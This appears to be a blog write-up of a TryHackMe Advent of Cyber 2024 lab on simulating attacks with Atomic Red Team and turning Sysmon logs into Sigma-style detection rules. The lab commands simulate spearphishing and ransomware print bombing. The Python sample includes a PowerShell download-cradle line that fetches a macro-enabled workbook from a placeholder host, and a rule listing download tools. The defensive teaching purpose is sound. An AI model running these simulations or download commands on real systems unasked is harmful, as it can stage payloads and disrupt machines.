THM AOC2024 Day 4: Strengthening Defenses with Attack Simulations
Every December, TryHackMe's Advent of Cyber delivers 24 free daily cybersecurity challenges, offering hands-on scenarios that simulate real-world attacks and defenses. Designed for beginners and professionals alike, it's an exciting, gamified way to explore topics like threat hunting, penetration testing, cryptography, and more. This event is perfect for building skills, gaining practical experience, and spreading some cybersecurity cheer during the festive season!
Learning Objectives
- Learn to identify malicious techniques using the MITRE ATT&CK framework.
- Explore the use of Atomic Red Team tests to simulate attack techniques.
- Understand how to create detection and alerting rules from attack simulations.
Tools of the Day
- MITRE ATT&CK Framework: A comprehensive database of tactics, techniques, and procedures (TTPs) used by threat actors.
- Atomic Red Team: A library of test cases for emulating attacks based on MITRE ATT&CK techniques.
- Windows Sysmon: A tool that provides detailed information about system activities, such as process creation and file changes.
Deep Dive Into the Tools
1. MITRE ATT&CK Framework
The MITRE ATT&CK Framework provides a structured way to analyze and understand attacker behaviors. It maps out tactics (the adversary's goals at each stage of an intrusion) and techniques (the specific methods used to reach them) into an accessible matrix. This framework is invaluable for building defense-in-depth strategies, because it lets you check that detections cover every stage of an intrusion rather than a single technique.
2. Atomic Red Team
Atomic Red Team simplifies testing detection gaps by providing predefined test cases mapped to MITRE ATT&CK techniques. These tests allow blue teams to simulate real-world attacks in controlled environments and evaluate their detection capabilities.
3. Sysmon
Sysmon logs granular system events, such as process creation and network connections, that help analysts detect malicious activity. Combined with tools like ELK or Sigma rules, Sysmon data forms the backbone of effective detection strategies.
Operation Blue: Investigating a Spearphishing Attack
1. Understanding Detection Gaps
Detection gaps arise when attacker techniques evolve faster than the rules written for them, or when malicious activity overlaps with normal behavior and cannot be separated cleanly. The MITRE ATT&CK framework helps prioritize detections by mapping them across the stages of an intrusion, ensuring multiple opportunities to identify malicious activity even if one technique slips through.
2. Running the Atomic Test for Spearphishing
To simulate a spearphishing attack (T1566.001), we executed the following Atomic Red Team command in PowerShell:
Invoke-AtomicTest T1566.001 -TestNumbers 1
This emulated the download of a phishing attachment, generating artifacts such as the PhishingAttachment.xlsm file (a macro-enabled Excel workbook).
3. Analyzing Logs Using Sysmon
Using Sysmon logs, we identified key artifacts:
- A process creation event (Sysmon Event ID 1) for PowerShell executing the Invoke-WebRequest command.
- A file creation event (Sysmon Event ID 11) for PhishingAttachment.xlsm.
These findings provided the necessary indicators of compromise (IOCs) to create detection rules.
Operation Red: Simulating a Ransomware Attack
1. Selecting the Correct Technique
The ransomware simulation focused on the ATT&CK sub-technique T1059.003 (Command and Scripting Interpreter: Windows Command Shell).
2. Executing the Ransomware Simulation
The following Atomic test was chosen:
Test Name: Simulate BlackByte Ransomware Print Bombing
Command:
Invoke-AtomicTest T1059.003 -TestNames "Simulate BlackByte Ransomware Print Bombing"
This test generated the file Wareville_Ransomware.txt, confirming successful execution.
3. Key Findings
The test produced actionable artifacts:
- Command executions (Sysmon Event ID 1) logged for the Windows command shell.
- File creation events (Sysmon Event ID 11) for Wareville_Ransomware.txt.
These details were used to draft detection rules for ransomware behaviors.
Recap of Learning Objectives
1. Identifying Malicious Techniques Using the MITRE ATT&CK Framework
The MITRE ATT&CK framework serves as a guide for blue teams, mapping real-world adversary tactics and techniques into a structured matrix. In this task, we used the framework to identify specific techniques like T1566.001 (Spearphishing Attachment) and T1059.003 (Windows Command Shell). Beyond the room, this framework is invaluable for aligning defenses with known threats, planning proactive detection strategies, and conducting risk assessments in enterprise environments.
In the real world, security teams often use MITRE ATT&CK to conduct tabletop exercises, train SOC analysts, and audit their coverage of critical TTPs. Its ability to link behaviors to specific threat actors also helps organizations anticipate potential adversaries.
2. Using Atomic Red Team for Attack Simulations
Atomic Red Team makes the theoretical actionable by providing easily executable tests for MITRE ATT&CK techniques. This tool is a game-changer for organizations seeking to validate their defenses, train their SOC teams, or understand how their detection tools respond to specific TTPs.
In practice, Atomic Red Team can be used in combination with continuous security validation platforms to run automated simulations across the environment, ensuring consistent monitoring and readiness. Security teams can even customize tests to reflect unique organizational risks or emulate recent threat actor behaviors.
3. Creating Alerting and Detection Rules
This task emphasized transforming simulated attacks into actionable detection rules. By analyzing Sysmon logs, we extracted indicators such as the PowerShell command line and the file creation events, and translated them into Sigma rules for monitoring and alerting.
Outside of this room, this process is critical for strengthening a SOC's detection capabilities. For example, detection rules derived from red team engagements or past incidents can be deployed across EDR, SIEM, or XDR solutions, enabling faster and more effective responses to future attacks. Organizations can also maintain a rule library to adapt quickly to emerging threats.
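To make the last step concrete, the following Python replays the Sysmon artifacts from both Operation Blue and Operation Red against a small set of Sigma-style rules. It is an added example, not code from the TryHackMe room or from the Atomic Red Team or Sigma projects: the events are constructed to resemble the flattened Sysmon JSON an ELK pipeline would hold, and the file paths, user name, download URL and the OneDrive allowlist entry are assumptions for illustration. The rule evaluator implements the subset of Sigma semantics that matters here (fields in a selection are ANDed, a list of values is ORed, modifiers such as contains and endswith, and a condition of the form "selection and not filter").

```python
"""Sigma-style detections replayed over constructed Sysmon events (added example)."""
from typing import Any

# Constructed sample log. Assumption: Winlogbeat-style flattened Sysmon fields.
SAMPLE_EVENTS = [
    {   # EventID 1 (ProcessCreate) left by the T1566.001 atomic test
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -c "Invoke-WebRequest -Uri https://example.invalid/PhishingAttachment.xlsm -OutFile $env:TEMP\PhishingAttachment.xlsm"',
    },
    {   # EventID 11 (FileCreate) for the downloaded attachment
        "EventID": 11,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "TargetFilename": r"C:\Users\analyst\AppData\Local\Temp\PhishingAttachment.xlsm",
    },
    {   # EventID 11 left by the T1059.003 BlackByte print-bombing test
        "EventID": 11,
        "Image": r"C:\Windows\System32\cmd.exe",
        "TargetFilename": r"C:\Users\analyst\Desktop\Wareville_Ransomware.txt",
    },
    {   # Benign noise: Excel saving a macro-free workbook; must not alert
        "EventID": 11,
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "TargetFilename": r"C:\Users\analyst\Documents\budget.xlsx",
    },
    {   # Benign noise: the sync client writing a macro-enabled workbook; excluded by a filter
        "EventID": 11,
        "Image": r"C:\Users\analyst\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
        "TargetFilename": r"C:\Users\analyst\OneDrive\reports\Q4.xlsm",
    },
]

# Rules in Sigma's shape: named selections of "field|modifier": value(s) plus a condition.
RULES = [
    {
        "title": "PowerShell download cradle (T1566.001 attachment retrieval)",
        "detection": {
            "selection": {
                "EventID": 1,
                "Image|endswith": r"\powershell.exe",
                # Invoke-WebRequest and its built-in PowerShell aliases; a list is OR in Sigma
                "CommandLine|contains": ["Invoke-WebRequest", "iwr ", "wget ", "curl "],
            },
            "condition": "selection",
        },
    },
    {
        "title": "Macro-enabled Office document written to disk (T1566.001)",
        "detection": {
            "selection": {"EventID": 11, "TargetFilename|endswith": [".xlsm", ".docm", ".pptm"]},
            # Assumed allowlist entry: the sync client legitimately writes such files
            "filter": {"Image|endswith": r"\OneDrive.exe"},
            "condition": "selection and not filter",
        },
    },
    {
        "title": "Ransom note dropped by cmd.exe (T1059.003 simulation artifact)",
        "detection": {
            "selection": {
                "EventID": 11,
                "Image|endswith": r"\cmd.exe",
                "TargetFilename|endswith": r"\Wareville_Ransomware.txt",
            },
            "condition": "selection",
        },
    },
]


def _match_value(actual: Any, modifier: str, expected: Any) -> bool:
    """Apply one Sigma modifier; string comparisons are case-insensitive as in Sigma."""
    if actual is None:
        return False
    if modifier == "":
        return str(actual).lower() == str(expected).lower()
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "startswith":
        return a.startswith(e)
    raise ValueError(f"unsupported modifier: {modifier}")


def _match_selection(event: dict, selection: dict) -> bool:
    """Every field in a selection must match (AND); a list of values matches any (OR)."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event.get(field), modifier, v) for v in values):
            return False
    return True


def rule_matches(event: dict, rule: dict) -> bool:
    """Evaluate a condition of the form 'a and not b' over the rule's named selections."""
    detection = rule["detection"]
    for term in detection["condition"].split(" and "):
        negate = term.startswith("not ")
        hit = _match_selection(event, detection[term[4:] if negate else term])
        if hit == negate:  # needed a hit but missed, or needed a miss but hit
            return False
    return True


def run_detections(events: list, rules: list = RULES) -> list:
    """Return (rule title, event) pairs; one event may trigger several rules."""
    return [(r["title"], ev) for ev in events for r in rules if rule_matches(ev, r)]


if __name__ == "__main__":
    for title, ev in run_detections(SAMPLE_EVENTS):
        print(f"[ALERT] {title}: EventID={ev['EventID']} Image={ev['Image']}")
```

Run against the sample, the first three events each raise one alert and the two benign events raise none. Two caveats worth carrying into real rules: the filter on the second rule is how Sigma expresses an allowlist, and every such exclusion is a place an attacker can hide (here, writing the payload through the sync folder), so keep them narrow. The third rule keys on the fixed filename the atomic test writes, which confirms the simulation was observed but is a brittle indicator; a production version should key on the behaviour (cmd.exe writing text files under an interactive user's profile from an unusual parent, or the printing activity the test is named for) rather than on the test's own artifact name.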
Real-World Context
Combining these tools and techniques allows organizations to maintain a proactive security posture. Threat actors constantly evolve, but by leveraging frameworks like MITRE ATT&CK and tools like Atomic Red Team, security teams can stay ahead. More importantly, these simulations foster collaboration between red and blue teams, creating a feedback loop that drives continuous improvement.
This process not only mitigates current threats but also builds resilience, ensuring organizations can adapt to future challenges. Are your defenses up to the task? This methodology can help answer that question.